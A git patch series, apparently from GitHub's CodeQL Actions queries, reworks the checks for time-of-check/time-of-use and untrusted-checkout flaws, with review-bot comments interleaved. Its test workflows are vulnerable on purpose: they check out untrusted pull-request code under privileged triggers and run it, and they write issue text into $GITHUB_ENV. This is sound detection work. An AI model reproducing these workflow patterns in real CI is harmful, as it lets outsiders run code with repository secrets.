@@ -118,7 +115,7 @@ class WorkflowCommandClobberingFromEnvVarSink extends OutputClobberingSink { WorkflowCommandClobberingFromEnvVarSink() { exists(Run run, string output_line, string clobbering_line, string var_name | run.getScript().splitAt("\n") = output_line and - singleLineWorkflowCmd(output_line, "set-output", _, _) and + Bash::singleLineWorkflowCmd(output_line, "set-output", _, _) and run.getScript().splitAt("\n") = clobbering_line and clobbering_line.regexpMatch(".*echo\\s+(-e\\s+)?(\"|')?\\$(\\{)?" + var_name + ".*") and exists(run.getInScopeEnvVarExpr(var_name)) and 
@@ -132,19 +129,16 @@ class WorkflowCommandClobberingFromFileReadSink extends OutputClobberingSink { exists(Run run, string output_line, string clobbering_line | run.getScriptScalar() = this.asExpr() and run.getScript().splitAt("\n") = output_line and - singleLineWorkflowCmd(output_line, "set-output", _, _) and + Bash::singleLineWorkflowCmd(output_line, "set-output", _, _) and run.getScript().splitAt("\n") = clobbering_line and ( // A file is read and its content is assigned to an env var that gets printed to stdout // - run: | // foo=$(> $GITHUB_OUTPUT | | .github/workflows/multiline.yml:11:9:15:6 | Run Step | echo "changelog<> $GITHUB_OUTPUT | | .github/workflows/multiline.yml:11:9:15:6 | Run Step | echo -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | EOF=SUBCOMMAND | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64) | | .github/workflows/multiline.yml:15:9:20:6 | Run Step | base64 | | .github/workflows/multiline.yml:15:9:20:6 | Run Step | cat status.output.json | | .github/workflows/multiline.yml:15:9:20:6 | Run Step | dd if=/dev/urandom bs=15 count=1 status=none | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | echo "$(cat status.output.json)" >> $GITHUB_OUTPUT | | .github/workflows/multiline.yml:15:9:20:6 | Run Step | echo "$EOF" >> $GITHUB_OUTPUT | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | echo "SUBCOMMAND" >> $GITHUB_OUTPUT | | .github/workflows/multiline.yml:15:9:20:6 | Run Step | echo "status<<$EOF" >> $GITHUB_OUTPUT | | .github/workflows/multiline.yml:20:9:24:6 | Run Step | echo "$EOF" >> $GITHUB_OUTPUT | | .github/workflows/multiline.yml:20:9:24:6 | Run Step | echo "response<<$EOF" >> $GITHUB_OUTPUT | 
@@ -132,7 +136,7 @@ | .github/workflows/multiline.yml:58:9:63:6 | Run Step | cat <<-EOF >> "$GITHUB_ENV" | | .github/workflows/multiline.yml:58:9:63:6 | Run Step | echo "FOO=$TITLE" | | .github/workflows/multiline.yml:63:9:66:6 | Run Step | cat issue.txt | -| .github/workflows/multiline.yml:63:9:66:6 | Run Step | echo REPO_NAME=SUBCOMMAND >> $GITHUB_ENV | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV | | .github/workflows/multiline.yml:63:9:66:6 | Run Step | grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' | | .github/workflows/multiline.yml:63:9:66:6 | Run Step | sed 's/\\\\r/\\\\n/g' | | .github/workflows/multiline.yml:63:9:66:6 | Run Step | tr -d ' ' | @@ -159,7 +163,7 @@ | .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | echo foo | | .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | ./venv/bin/activate | | .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | sh venv/bin/activate.sh | -| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | echo SUBCOMMAND | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | echo $(sh venv/bin/activate.sh) | | .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | sh venv/bin/activate.sh | | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | echo bar | | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | echo foo | 
@@ -185,15 +189,11 @@ | .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | echo "bar" | | .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | echo "foo" | | .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | npm i | -| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | echo "foo SUBCOMMAND bar" | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | echo "foo `npm i` bar" | | .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | npm i | | .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | dotnet test foo/Tests.csproj -c Release | | .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | go run foo.go | -| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | " config.json | -| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | git_branch = .* | -| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | -| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | sed -i "s | -| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\" | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | | .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | sed -f ./config.sed file.txt > foo.txt | | .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | sed -f config file.txt > foo.txt | | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | awk -f ./config.awk > foo.txt | diff --git a/ql/test/library-tests/poisonable_steps.expected b/ql/test/library-tests/poisonable_steps.expected index 100eddb1400..a87ec0a341c 100644 --- a/ql/test/library-tests/poisonable_steps.expected +++ b/ql/test/library-tests/poisonable_steps.expected 
@@ -1,5 +1,3 @@ -| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | -| .github/workflows/multiline.yml:63:9:66:6 | Run Step | | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | diff --git a/ql/test/library-tests/test.ql b/ql/test/library-tests/test.ql index 80ebd80b4c2..5880e06da7f 100644 --- a/ql/test/library-tests/test.ql +++ b/ql/test/library-tests/test.ql @@ -81,7 +81,7 @@ query predicate writeToGitHubEnv1(string content) { //"FOO\necho \"VAR3<> $GITHUB_ENV\necho \"$TITLE\" >> $GITHUB_ENV\necho \"EOF\" >> $GITHUB_ENV\nBAR", ] and //linesFileWrite(t, _, "$GITHUB_ENV", content, _) - blockFileWrite(t, _, "$GITHUB_ENV", content, _) + Bash::blockFileWrite(t, _, "$GITHUB_ENV", content, _) //extractFileWrite(t, "GITHUB_ENV", content) ) } @@ -113,8 +113,8 @@ query predicate writeToGitHubEnv(string key, string value, string content) { "echo VAR15=$(> $GITHUB_ENV", "echo VAR16=$(cat issue.txt | sed 's/\\r/\\n/g' | grep -ioE '\\s*[a-z0-9_-]+/[a-z0-9_-]+\\s*$' | tr -d ' ') >> $GITHUB_ENV", ] and - extractFileWrite(t, "GITHUB_ENV", content) and - extractVariableAndValue(content, key, value) + Bash::extractFileWrite(t, "GITHUB_ENV", content) and + Bash::extractVariableAndValue(content, key, value) ) } @@ -132,8 +132,8 @@ query predicate writeToGitHubOutput(string key, string value, string content) { "echo VAR8=$(> ${GITHUB_OUTPUT}", "echo VAR9=$(> \"${GITHUB_OUTPUT}\"", ] and - extractFileWrite(t, "GITHUB_OUTPUT", content) and - extractVariableAndValue(content, key, value) + Bash::extractFileWrite(t, "GITHUB_OUTPUT", content) and + Bash::extractVariableAndValue(content, key, value) ) } 
@@ -150,6 +150,6 @@ query predicate isBashParameterExpansion(string parameter, string operator, stri "${parameter21%%pattern}", "${parameter22/pattern/string}", "${parameter23//pattern/string}", ] and - isBashParameterExpansion(test, parameter, operator, params) + Bash::isBashParameterExpansion(test, parameter, operator, params) ) } From 5494f7f09953e8fa7f277528d6ac62db3019b3e0 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 3 Oct 2024 14:16:37 +0200 Subject: [PATCH 0565/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 9637b993118..49cb71df1b2 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.62 +version: 0.1.63 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 6548292a677..864c4949a12 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.62 +version: 0.1.63 groups: [actions, queries] suites: codeql-suites extractor: javascript From 350b354fb3f9dc179f0c8bed0efb7d527cef5eaa Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 3 Oct 2024 14:17:45 +0200 Subject: [PATCH 0566/1267] remmove leftover comments --- ql/lib/codeql/actions/Helper.qll | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index 8391463fd20..688d62acbe1 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll 
@@ -202,10 +202,8 @@ module Bash { "((echo|printf)\\s+['|\"]?(EOF)['|\"]?\\s*>>\\s*\\S+\\s*[\r\n]*).*" and content = trimQuotes(script.regexpCapture(regexp, 3)) + "\n" + - // "$(" + - trimQuotes(script.regexpCapture(regexp, 6)) + - // ")\n" + - "\n" + trimQuotes(script.regexpCapture(regexp, 4)) and + trimQuotes(script.regexpCapture(regexp, 6)) + "\n" + + trimQuotes(script.regexpCapture(regexp, 4)) and cmd = "echo" and file = trimQuotes(script.regexpCapture(regexp, 5)) and filters = "" From 0c9b808fdf91d0b06014a2abbaebf0199f836553 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 3 Oct 2024 14:41:18 +0200 Subject: [PATCH 0567/1267] Make Argument Injection queries experimental --- ql/src/Security/CWE-088/ArgumentInjectionCritical.ql | 1 + ql/src/Security/CWE-088/ArgumentInjectionMedium.ql | 1 + 2 files changed, 2 insertions(+) diff --git a/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql b/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql index 2626de31935..5962132d72e 100644 --- a/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql +++ b/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql @@ -8,6 +8,7 @@ * @id actions/argument-injection/critical * @tags actions * security + * experimental * external/cwe/cwe-088 */ diff --git a/ql/src/Security/CWE-088/ArgumentInjectionMedium.ql b/ql/src/Security/CWE-088/ArgumentInjectionMedium.ql index fa5b750fd89..37acbc05122 100644 --- a/ql/src/Security/CWE-088/ArgumentInjectionMedium.ql +++ b/ql/src/Security/CWE-088/ArgumentInjectionMedium.ql @@ -8,6 +8,7 @@ * @id actions/argument-injection/medium * @tags actions * security + * experimental * external/cwe/cwe-088 */ From a3cf8766ffe7d42e8ac77cc22ad3e1f6f404a5b3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 3 Oct 2024 14:42:23 +0200 Subject: [PATCH 0568/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) 
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml
index 49cb71df1b2..0be2657c99e 100644
--- a/ql/lib/qlpack.yml
+++ b/ql/lib/qlpack.yml
@@ -2,7 +2,7 @@
 library: true
 warnOnImplicitThis: true
 name: github/actions-all
-version: 0.1.63
+version: 0.1.64
 dependencies:
 codeql/util: ^1.0.1
 codeql/yaml: ^1.0.1
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml
index 864c4949a12..ebdf6b364b2 100644
--- a/ql/src/qlpack.yml
+++ b/ql/src/qlpack.yml
@@ -1,7 +1,7 @@
 ---
 library: false
 name: github/actions-queries
-version: 0.1.63
+version: 0.1.64
 groups: [actions, queries]
 suites: codeql-suites
 extractor: javascript
From 860eda9c041162b5031c51b2f8a91c652b4fe11f Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 4 Oct 2024 18:04:13 +0200 Subject: [PATCH 0569/1267] Improve control checks to better account for toctou issues --- .../codeql/actions/security/ControlChecks.qll | 64 +++-- .../UntrustedCheckoutTOCTOUCritical.ql | 12 +- .../CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 11 +- .../CWE-829/UntrustedCheckoutCritical.ql | 18 +- .../{deployment.yml => deployment1.yml} | 0 .../CWE-367/.github/workflows/deployment2.yml | 31 ++ .../CWE-367/.github/workflows/test0.yml | 68 +++++ .../CWE-367/.github/workflows/test1.yml | 96 +++++++ .../CWE-367/.github/workflows/test2.yml | 227 +++++++++++++++ .../CWE-367/.github/workflows/test3.yml | 271 ++++++++++++++++++ .../CWE-367/.github/workflows/test4.yml | 89 ++++++ .../CWE-367/.github/workflows/test5.yml | 209 ++++++++++++++ .../CWE-367/.github/workflows/test6.yml | 253 ++++++++++++++++ .../UntrustedCheckoutTOCTOUCritical.expected | 105 ++++++- .../UntrustedCheckoutTOCTOUHigh.expected | 2 + .../UntrustedCheckoutCritical.expected | 3 - 16 files changed, 1399 insertions(+), 60 deletions(-) rename ql/test/query-tests/Security/CWE-367/.github/workflows/{deployment.yml => deployment1.yml} (100%) create mode 100644 ql/test/query-tests/Security/CWE-367/.github/workflows/deployment2.yml create mode 100644 ql/test/query-tests/Security/CWE-367/.github/workflows/test0.yml create mode 100644 ql/test/query-tests/Security/CWE-367/.github/workflows/test1.yml create mode 100644 ql/test/query-tests/Security/CWE-367/.github/workflows/test2.yml create mode 100644 ql/test/query-tests/Security/CWE-367/.github/workflows/test3.yml create mode 100644 ql/test/query-tests/Security/CWE-367/.github/workflows/test4.yml create mode 100644 ql/test/query-tests/Security/CWE-367/.github/workflows/test5.yml create mode 100644 ql/test/query-tests/Security/CWE-367/.github/workflows/test6.yml 
diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index 801ccb6e986..86de44c3b5c 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -1,30 +1,44 @@ import actions -string any_relevant_category() { +string any_category() { result = [ "untrusted-checkout", "output-clobbering", "envpath-injection", "envvar-injection", "command-injection", "argument-injection", "code-injection", "cache-poisoning", - "untrusted-checkout-toctou", "artifact-poisoning" + "untrusted-checkout-toctou", "artifact-poisoning", "artifact-poisoning-toctou" ] } -string any_non_toctou_category() { - result = any_relevant_category() and not result = "untrusted-checkout-toctou" +string non_toctou_category() { + result = any_category() and not result = "untrusted-checkout-toctou" } -string any_relevant_event() { +string toctou_category() { result = ["untrusted-checkout-toctou", "artifact-poisoning-toctou"] } + +string any_event() { result = actor_not_attacker_event() or result = actor_is_attacker_event() } + +string actor_is_attacker_event() { result = [ + // actor and attacker have to be the same "pull_request_target", - "issue_comment", - "pull_request_comment", "workflow_run", + "discussion_comment", + "discussion", "issues", "fork", - "watch", - "discussion_comment", - "discussion" + "watch" + ] +} + +string actor_not_attacker_event() { + result = + [ + // actor and attacker can be different + // actor may be a collaborator, but the attacker is may be the author of the PR that gets commented + // therefore it may be vulnerable to TOCTOU races where the actor reviews one thing and the attacker changes it + "issue_comment", + "pull_request_comment", ] } 
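Review bot: `non_toctou_category()` still excludes only `"untrusted-checkout-toctou"`, although this hunk adds `"artifact-poisoning-toctou"` to `any_category()` and lists both values in `toctou_category()`. As written, `"artifact-poisoning-toctou"` counts as a non-TOCTOU category, so every check that uses `non_toctou_category()` for `actor_not_attacker_event()` is treated as protecting it and can hide a result. Defining it through the new predicate keeps the two in step: `result = any_category() and not result = toctou_category()`. The comment in `actor_not_attacker_event()` also reads "the attacker is may be the author", where "the attacker may be the author" is meant.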
@@ -81,7 +95,9 @@ abstract class AssociationCheck extends ControlCheck { // - they are effective against pull requests and workflow_run (since these are triggered by pull_requests) since they can control who is making the PR // - they are not effective against issue_comment since the author of the comment may not be the same as the author of the PR override predicate protectsCategoryAndEvent(string category, string event) { - event = ["pull_request_target", "workflow_run"] and category = any_relevant_category() + event = actor_is_attacker_event() and category = any_category() + or + event = actor_not_attacker_event() and category = non_toctou_category() } } @@ -90,7 +106,9 @@ abstract class ActorCheck extends ControlCheck { // - they are effective against pull requests and workflow_run (since these are triggered by pull_requests) since they can control who is making the PR // - they are not effective against issue_comment since the author of the comment may not be the same as the author of the PR override predicate protectsCategoryAndEvent(string category, string event) { - event = ["pull_request_target", "workflow_run"] and category = any_relevant_category() + event = actor_is_attacker_event() and category = any_category() + or + event = actor_not_attacker_event() and category = non_toctou_category() } } @@ -106,8 +124,9 @@ abstract class PermissionCheck extends ControlCheck { // - they are effective against pull requests/workflow_run since they can control who can make changes // - they are not effective against issue_comment since the author of the comment may not be the same as the author of the PR override predicate protectsCategoryAndEvent(string category, string event) { - event = ["pull_request_target", "workflow_run", "issue_comment"] and - category = any_relevant_category() + event = actor_is_attacker_event() and category = any_category() + or + event = actor_not_attacker_event() and category = non_toctou_category() } } 
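Review bot: The comments kept above `protectsCategoryAndEvent` in `AssociationCheck`, `ActorCheck` and `PermissionCheck` still say these checks "are not effective against issue_comment", but the new second disjunct credits them with every non-TOCTOU category on `actor_not_attacker_event()`. The last bullet could read `// - on issue_comment/pull_request_comment the commenter may differ from the PR author, so only the non-TOCTOU categories are covered there`. The first bullet names only pull requests and workflow_run, although `actor_is_attacker_event()` now also returns `issues`, `fork`, `watch`, `discussion` and `discussion_comment`. All three class bodies start outside their hunks.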
@@ -115,7 +134,9 @@ abstract class LabelCheck extends ControlCheck { // checks if the issue/pull_request is labeled, which implies that it could have been approved // - they dont protect against mutation attacks override predicate protectsCategoryAndEvent(string category, string event) { - event = ["pull_request_target", "workflow_run"] and category = any_non_toctou_category() + event = actor_is_attacker_event() and category = any_category() + or + event = actor_not_attacker_event() and category = non_toctou_category() } } @@ -123,14 +144,16 @@ class EnvironmentCheck extends ControlCheck instanceof Environment { // Environment checks are not effective against any mutable attacks // they do actually protect against untrusted code execution (sha) override predicate protectsCategoryAndEvent(string category, string event) { - event = ["pull_request_target", "workflow_run"] and category = any_non_toctou_category() + event = actor_is_attacker_event() and category = any_category() + or + event = actor_not_attacker_event() and category = non_toctou_category() } } abstract class CommentVsHeadDateCheck extends ControlCheck { override predicate protectsCategoryAndEvent(string category, string event) { // by itself, this check is not effective against any attacks - none() + event = actor_not_attacker_event() and category = toctou_category() } } @@ -187,7 +210,7 @@ class PullRequestTargetRepositoryIfCheck extends RepositoryCheck instanceof If { } override predicate protectsCategoryAndEvent(string category, string event) { - event = "pull_request_target" and category = any_relevant_category() + event = "pull_request_target" and category = any_category() } } @@ -205,7 +228,7 @@ class WorkflowRunRepositoryIfCheck extends RepositoryCheck instanceof If { } override predicate protectsCategoryAndEvent(string category, string event) { - event = "workflow_run" and category = any_relevant_category() + event = "workflow_run" and category = any_category() } } 
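Review bot: `LabelCheck` now returns `category = any_category()` for `actor_is_attacker_event()`, which includes both TOCTOU categories, yet the comment directly above still says label checks "dont protect against mutation attacks" and the removed line used the non-TOCTOU set. The same body is added to `EnvironmentCheck` in the next hunk, under "not effective against any mutable attacks". If the comments are right, a labelled or environment-gated `pull_request_target` workflow that checks out a mutable ref would no longer be reported by the CWE-367 queries; the body that matches the comments is `event = any_event() and category = non_toctou_category()`. If the widening is intended, the comments need updating instead. Both class bodies start outside their hunks.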
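Review bot: The comment inside `CommentVsHeadDateCheck.protectsCategoryAndEvent` still reads "by itself, this check is not effective against any attacks", while the body changes from `none()` to `event = actor_not_attacker_event() and category = toctou_category()`. A comment that matches the new body would be `// covers only the TOCTOU categories on comment-triggered events; it says nothing about who commented, so it must be paired with an actor, association or permission check`. That pairing is what the CWE-367 queries in this commit rely on when they ask for one check on "untrusted-checkout" and another on "untrusted-checkout-toctou".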
@@ -250,6 +273,9 @@ class PermissionActionCheck extends PermissionCheck instanceof UsesStep { not exists(this.getArgument("permission-level")) or this.getArgument("permission-level") = ["write", "admin"] ) + or + this.getCallee() = "actions/github-script" and + this.getArgument("script").splitAt("\n").matches("%getCollaboratorPermissionLevel%") } } diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql index 11897c464bf..16fb2606af7 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql @@ -18,18 +18,14 @@ import codeql.actions.security.ControlChecks query predicate edges(Step a, Step b) { a.getNextStep() = b } -from - LocalJob job, MutableRefCheckoutStep checkout, PoisonableStep step, ControlCheck check, - Event event +from MutableRefCheckoutStep checkout, PoisonableStep step, Event event where - job.getAStep() = checkout and // the checked-out code may lead to arbitrary code execution checkout.getAFollowingStep() = step and // the checkout occurs in a privileged context inPrivilegedContext(checkout, event) and // the mutable checkout step is protected by an Insufficient access check - check.protects(checkout, event, "untrusted-checkout") and - not check.protects(checkout, event, "untrusted-checkout-toctou") + exists(ControlCheck check1 | check1.protects(checkout, event, "untrusted-checkout")) and + not exists(ControlCheck check2 | check2.protects(checkout, event, "untrusted-checkout-toctou")) select step, checkout, step, - "Insufficient protection against execution of untrusted code on a privileged workflow on check $@.", - check, check.toString() + "Insufficient protection against execution of untrusted code on a privileged workflow." diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql index 5956b52ccbe..d4ed49e497a 100644 
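Review bot: The added `actions/github-script` disjunct accepts any step whose script has a line containing `getCollaboratorPermissionLevel`, whereas the existing branch requires `permission-level` to be absent or `write`/`admin`. A script that only calls the API, compares the result against a lower level, or mentions the name in a comment is therefore counted as a permission check and can suppress alerts on the steps it is taken to protect. Since the match is a heuristic, the code should say so, e.g. `// heuristic: the script mentions the API; the level it compares against is not verified`. The enclosing predicate starts outside the hunk.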
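Review bot: The alert message loses its only `$@` placeholder, so a result no longer points at anything beyond the step and the checkout; UntrustedCheckoutTOCTOUHigh.ql gets the same change. `event` is still bound in the `from` clause and UntrustedCheckoutCritical.ql already reports it, so the trigger can be kept for triage: `"Insufficient protection against execution of untrusted code on a privileged workflow ($@).", event, event.getName()`. The retained comment "protected by an Insufficient access check" now sits over two `exists` clauses and would read better as `// some check covers untrusted-checkout, but none covers the TOCTOU variant`.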
--- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql @@ -16,17 +16,14 @@ import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps import codeql.actions.security.ControlChecks -from LocalJob job, MutableRefCheckoutStep checkout, ControlCheck check, Event event +from MutableRefCheckoutStep checkout, Event event where - job.getAStep() = checkout and // there are no evidences that the checked-out gets executed not checkout.getAFollowingStep() instanceof PoisonableStep and // the checkout occurs in a privileged context inPrivilegedContext(checkout, event) and - event = job.getATriggerEvent() and // the mutable checkout step is protected by an Insufficient access check - check.protects(checkout, event, "untrusted-checkout") and - not check.protects(checkout, event, "untrusted-checkout-toctou") + exists(ControlCheck check1 | check1.protects(checkout, event, "untrusted-checkout")) and + not exists(ControlCheck check2 | check2.protects(checkout, event, "untrusted-checkout-toctou")) select checkout, - "Insufficient protection against execution of untrusted code on a privileged workflow on step $@.", - check, check.toString() + "Insufficient protection against execution of untrusted code on a privileged workflow." diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index f9f95191795..37628a29489 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql 
@@ -26,22 +26,6 @@ where checkout.getAFollowingStep() = step and // the checkout occurs in a privileged context inPrivilegedContext(step, event) and - ( - // issue_comment: check for date comparison checks and actor/access control checks - event.getName() = "issue_comment" and - not exists(ControlCheck check, CommentVsHeadDateCheck date_check | - ( - check instanceof ActorCheck or - check instanceof AssociationCheck or - check instanceof PermissionCheck - ) and - check.dominates(step) and - date_check.dominates(step) - ) - or - // not issue_comment triggered workflows - not event.getName() = "issue_comment" and - not exists(ControlCheck check | check.protects(step, event, "untrusted-checkout")) - ) + not exists(ControlCheck check | check.protects(step, event, "untrusted-checkout")) select step, checkout, step, "Execution of untrusted code on a privileged workflow. $@", event, event.getLocation().getFile().toString() diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/deployment.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/deployment1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-367/.github/workflows/deployment.yml rename to ql/test/query-tests/Security/CWE-367/.github/workflows/deployment1.yml diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/deployment2.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/deployment2.yml new file mode 100644 index 00000000000..5c6e28eafc8 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/.github/workflows/deployment2.yml 
@@ -0,0 +1,31 @@ +# https://github.com/AdnaneKhan/ActionsTOCTOU/blob/main/.github/workflows/deployment_victim.yml +name: Environment PR Check + +on: + pull_request_target: + branches: + - main + paths: + - 'README.md' + workflow_dispatch: +jobs: + test: + environment: Public CI + runs-on: ubuntu-latest + steps: + - name: Checkout from PR branch + uses: actions/checkout@v4 + with: + repository: ${{ github.event.pull_request.head.repo.full_name }} + ref: ${{ github.event.pull_request.head.sha }} + + - name: Set Node.js 20.x for GitHub Action + uses: actions/setup-node@v4 + with: + node-version: 20.x + + - name: installing node_modules + run: cd deployment_example && npm install + + - name: Build GitHub Action + run: cd deployment_example && npm run build diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/test0.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/test0.yml new file mode 100644 index 00000000000..a4acd738766 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/.github/workflows/test0.yml 
@@ -0,0 +1,68 @@ +# https://github.com/AdnaneKhan/ActionsTOCTOU/blob/main/.github/workflows/comment_victim.yml +name: Comment Triggered Test +on: + issue_comment: + types: [created] +permissions: 'write-all' +jobs: + test1: + if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} + runs-on: ubuntu-latest + steps: + + - uses: actions/github-script@v6 + name: Get PR branch + id: issue + with: + script: | + const pr = context.payload.issue.number + const data = await github.rest.pulls.get({ + owner: context.repo.owner, + repo: context.repo.repo, + pull_number: pr + }) + return { + ref: data.data.head.ref, + sha: data.data.head.sha, + } + - uses: actions/checkout@v4 + with: + submodules: recursive + ref: ${{ fromJson(steps.issue.outputs.result).sha }} + - run: bash comment_example/tests.sh + + test2: + if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} + runs-on: ubuntu-latest + steps: + + - uses: actions/github-script@v6 + name: Get PR branch + id: issue + with: + script: | + const pr = context.payload.issue.number + const data = await github.rest.pulls.get({ + owner: context.repo.owner, + repo: context.repo.repo, + pull_number: pr + }) + return { + ref: data.data.head.ref, + sha: data.data.head.sha, + } + - uses: actions/checkout@v4 + with: + submodules: recursive + ref: ${{ fromJson(steps.issue.outputs.result).ref }} + - run: bash comment_example/tests.sh + + test3: + if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + submodules: recursive + ref: "refs/pull/${{ github.event.number }}/merge" + - run: 
bash comment_example/tests.sh diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/test1.yml new file mode 100644 index 00000000000..878b8377961 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/.github/workflows/test1.yml 
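Review bot: Job `test3` builds its ref from `github.event.number`, which an `issue_comment` payload does not carry; the PR number is at `github.event.issue.number`, which is what the `github-script` steps above read through `context.payload.issue.number`. The expression would therefore expand to `refs/pull//merge` at run time. If the job is meant to exercise the merge-ref pattern on a comment trigger, `ref: "refs/pull/${{ github.event.issue.number }}/merge"` models a workflow that would actually check something out. The three jobs otherwise differ only in the ref they use (`sha`, `ref`, merge ref), so a one-line comment per job stating whether it should alert would make the .expected change reviewable.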
